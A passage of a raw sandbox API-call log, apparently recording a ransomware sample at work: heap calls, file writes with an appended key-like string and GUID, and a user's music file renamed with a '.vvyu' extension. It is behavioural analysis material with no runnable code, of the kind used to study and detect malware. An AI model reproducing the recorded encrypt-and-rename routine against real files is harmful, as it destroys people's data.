RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0201.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33f8 [0201.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0201.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3458 [0201.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0201.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0201.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0201.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3470 [0201.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3410 [0201.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0201.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33e0 [0201.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0201.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0201.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0201.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0201.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0201.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0201.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0201.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fc00 | out: hHeap=0x620000) returned 1 [0201.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0201.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.049] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x12b6a, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x12b6a, lpOverlapped=0x0) returned 1 [0201.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.051] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x12b6f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.051] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.052] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.053] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.053] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.053] CloseHandle (hObject=0x510) returned 1 [0201.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0201.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0201.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0201.055] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\FGNL6u1fSAF.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\fgnl6u1fsaf.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\FGNL6u1fSAF.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\fgnl6u1fsaf.m4a.vvyu")) returned 1 [0201.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0201.057] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0201.059] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ea885f0, ftCreationTime.dwHighDateTime=0x1d89883, ftLastAccessTime.dwLowDateTime=0xc0a723b0, ftLastAccessTime.dwHighDateTime=0x1d8a724, ftLastWriteTime.dwLowDateTime=0xc0a723b0, ftLastWriteTime.dwHighDateTime=0x1d8a724, nFileSizeHigh=0x0, nFileSizeLow=0x12b6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FGNL6u1fSAF.m4a", cAlternateFileName="FGNL6U~1.M4A")) returned 0 [0201.059] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0201.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.060] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0201.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0201.060] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0201.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0201.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0201.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.081] HeapFree (in: hHeap=0x620000, 